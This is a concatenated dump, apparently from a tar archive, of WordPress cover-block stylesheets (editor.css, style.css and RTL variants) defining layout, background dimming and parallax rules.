.wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{color:inherit;direction:rtl;width:100%;z-index:1}.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{align-items:flex-start;justify-content:flex-start}.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{align-items:flex-start;justify-content:center}.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{align-items:flex-start;justify-content:flex-end}.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{align-items:center;justify-content:flex-start}.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{align-items:center;justify-content:center}.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{align-items:center;justify-content:flex-end}.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{align-items:flex-end;justify-content:flex-start}.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{align-items:flex-end;justify-content:center}.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{align-items:flex-end;justify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{margin:0;width:auto}.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{border:none;bottom:0;box-shadow:none;height:100%;left:0;margin:0;max-height:none;max-width:none;object-fit:cover;outline:none;padding:0;position:absolute;right:0;top:0;width:100%}.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:fixed;background-repeat:no-repeat;background-size:cover}@supports (-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media (prefers-reduced-motion:reduce){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{background-repeat:repeat;background-size:auto}.wp-block-cover__image-background,.wp-block-cover__video-background{z-index:0}.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{color:#fff}.wp-block-cover-image .wp-block-cover.has-left-content{justify-content:flex-start}.wp-block-cover-image .wp-block-cover.has-right-content{justify-content:flex-end}.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{margin-right:0;text-align:right}.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{margin-left:0;text-align:left}.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{font-size:2em;line-height:1.25;margin-bottom:0;max-width:840px;padding:.44em;text-align:center;z-index:1}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}:root :where(.wp-block-cover h1:not(.has-text-color)),:root :where(.wp-block-cover h2:not(.has-text-color)),:root :where(.wp-block-cover h3:not(.has-text-color)),:root :where(.wp-block-cover h4:not(.has-text-color)),:root :where(.wp-block-cover h5:not(.has-text-color)),:root :where(.wp-block-cover h6:not(.has-text-color)),:root :where(.wp-block-cover p:not(.has-text-color)){color:inherit}cover/editor.css000060400000003741151330427370007670 0ustar00.editor-styles-wrapper .wp-block-cover{
  box-sizing:border-box;
}
.wp-block-cover.is-placeholder{
  align-items:stretch;
  display:flex;
  min-height:240px;
  padding:0 !important;
}
.wp-block-cover.is-placeholder .components-placeholder.is-large{
  justify-content:flex-start;
  z-index:1;
}
.wp-block-cover.is-placeholder:focus:after{
  min-height:auto;
}
.wp-block-cover.components-placeholder h2{
  color:inherit;
}
.wp-block-cover.is-transient{
  position:relative;
}
.wp-block-cover.is-transient:before{
  background-color:#fff;
  content:"";
  height:100%;
  opacity:.3;
  position:absolute;
  width:100%;
  z-index:1;
}
.wp-block-cover .components-spinner{
  left:50%;
  margin:0;
  position:absolute;
  top:50%;
  transform:translate(-50%, -50%);
  z-index:1;
}
.wp-block-cover .wp-block-cover__inner-container{
  margin-left:0;
  margin-right:0;
  text-align:left;
}
.wp-block-cover .wp-block-cover__placeholder-background-options{
  width:100%;
}
.wp-block-cover .wp-block-cover__image--placeholder-image{
  bottom:0;
  left:0;
  position:absolute;
  right:0;
  top:0;
}

[data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{
  max-width:420px;
  width:100%;
}

.block-library-cover__reset-button{
  margin-left:auto;
}

.block-library-cover__resize-container{
  bottom:0;
  left:0;
  min-height:50px;
  position:absolute !important;
  right:0;
  top:0;
}

.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{
  overflow:visible;
  pointer-events:none;
}

.wp-block-cover>.components-drop-zone .components-drop-zone__content{
  opacity:.8 !important;
}

.block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{
  background-attachment:scroll;
}

.color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){
  margin-top:24px;
}cover/style.css000060400000044042151330427370007541 0ustar00.wp-block-cover,.wp-block-cover-image{
  align-items:center;
  background-position:50%;
  box-sizing:border-box;
  display:flex;
  justify-content:center;
  min-height:430px;
  overflow:hidden;
  overflow:clip;
  padding:1em;
  position:relative;
}
.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){
  background-color:#000;
}
.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{
  background-color:initial;
}
.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{
  background-color:inherit;
  content:"";
}
.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{
  bottom:0;
  left:0;
  opacity:.5;
  position:absolute;
  right:0;
  top:0;
  z-index:1;
}
.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{
  opacity:.1;
}
.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{
  opacity:.2;
}
.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{
  opacity:.3;
}
.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{
  opacity:.4;
}
.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{
  opacity:.5;
}
.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{
  opacity:.6;
}
.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{
  opacity:.7;
}
.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{
  opacity:.8;
}
.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{
  opacity:.9;
}
.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{
  opacity:1;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{
  opacity:0;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{
  opacity:.1;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{
  opacity:.2;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{
  opacity:.3;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{
  opacity:.4;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{
  opacity:.5;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{
  opacity:.6;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{
  opacity:.7;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{
  opacity:.8;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{
  opacity:.9;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{
  opacity:1;
}
.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{
  max-width:420px;
  width:100%;
}
.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{
  display:flex;
}
.wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{
  color:inherit;
  width:100%;
  z-index:1;
}
.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{
  align-items:flex-start;
  justify-content:flex-start;
}
.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{
  align-items:flex-start;
  justify-content:center;
}
.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{
  align-items:flex-start;
  justify-content:flex-end;
}
.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{
  align-items:center;
  justify-content:flex-start;
}
.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{
  align-items:center;
  justify-content:center;
}
.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{
  align-items:center;
  justify-content:flex-end;
}
.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{
  align-items:flex-end;
  justify-content:flex-start;
}
.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{
  align-items:flex-end;
  justify-content:center;
}
.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{
  align-items:flex-end;
  justify-content:flex-end;
}
.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{
  margin:0;
}
.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{
  margin:0;
  width:auto;
}
.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{
  border:none;
  bottom:0;
  box-shadow:none;
  height:100%;
  left:0;
  margin:0;
  max-height:none;
  max-width:none;
  object-fit:cover;
  outline:none;
  padding:0;
  position:absolute;
  right:0;
  top:0;
  width:100%;
}

.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{
  background-attachment:fixed;
  background-repeat:no-repeat;
  background-size:cover;
}
@supports (-webkit-touch-callout:inherit){
  .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{
    background-attachment:scroll;
  }
}
@media (prefers-reduced-motion:reduce){
  .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{
    background-attachment:scroll;
  }
}
.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{
  background-repeat:repeat;
  background-size:auto;
}

.wp-block-cover__image-background,.wp-block-cover__video-background{
  z-index:0;
}
.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{
  color:#fff;
}

.wp-block-cover-image .wp-block-cover.has-left-content{
  justify-content:flex-start;
}
.wp-block-cover-image .wp-block-cover.has-right-content{
  justify-content:flex-end;
}

.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{
  margin-left:0;
  text-align:left;
}

.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{
  margin-right:0;
  text-align:right;
}

.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{
  font-size:2em;
  line-height:1.25;
  margin-bottom:0;
  max-width:840px;
  padding:.44em;
  text-align:center;
  z-index:1;
}

:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){
  color:#fff;
}

:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){
  color:#000;
}

:root :where(.wp-block-cover h1:not(.has-text-color)),:root :where(.wp-block-cover h2:not(.has-text-color)),:root :where(.wp-block-cover h3:not(.has-text-color)),:root :where(.wp-block-cover h4:not(.has-text-color)),:root :where(.wp-block-cover h5:not(.has-text-color)),:root :where(.wp-block-cover h6:not(.has-text-color)),:root :where(.wp-block-cover p:not(.has-text-color)){
  color:inherit;
}cover/style-rtl.css000060400000044100151330427370010333 0ustar00.wp-block-cover,.wp-block-cover-image{
  align-items:center;
  background-position:50%;
  box-sizing:border-box; direction:ltr;
  display:flex;
  justify-content:center;
  min-height:430px;
  overflow:hidden;
  overflow:clip;
  padding:1em;
  position:relative;
}
.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){
  background-color:#000;
}
.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{
  background-color:initial;
}
.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{
  background-color:inherit;
  content:"";
}
.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{
  bottom:0;
  left:0;
  opacity:.5;
  position:absolute;
  right:0;
  top:0;
  z-index:1;
}
.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{
  opacity:.1;
}
.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{
  opacity:.2;
}
.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{
  opacity:.3;
}
.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{
  opacity:.4;
}
.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{
  opacity:.5;
}
.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{
  opacity:.6;
}
.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{
  opacity:.7;
}
.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{
  opacity:.8;
}
.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{
  opacity:.9;
}
.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{
  opacity:1;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{
  opacity:0;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{
  opacity:.1;
}
